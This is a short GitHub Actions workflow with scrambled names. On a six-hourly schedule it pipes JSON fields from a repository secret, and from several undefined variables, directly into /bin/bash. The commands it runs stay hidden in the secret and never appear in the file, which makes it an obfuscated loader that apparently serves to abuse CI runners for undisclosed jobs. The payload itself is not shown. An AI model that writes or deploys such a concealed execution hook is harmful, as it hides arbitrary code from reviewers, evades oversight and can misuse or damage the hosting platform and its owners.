name: sognyangmin

on:
  workflow_dispatch:
  schedule:
    - cron: '33 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sognyangmin
        env:
          jh553: ${{ secrets.jh553 }}
        run: |
          echo $jh553 | jq -r .ebbd7 | /bin/bash
          echo $nvwpe85695 | jq -r .sa63018 | /bin/bash
          echo $wuwgp80846 | jq -r .cw7 | /bin/bash
          echo $bj832 | jq -r .qfbk4437 | /bin/bash
          echo $ywdug1 | jq -r .ngk10 | /bin/bash
          echo $p313 | jq -r .dh56082 | /bin/bash
          echo $wovx24 | jq -r .houjh8 | /bin/bash
          echo $deena963 | jq -r .ej10 | /bin/bash

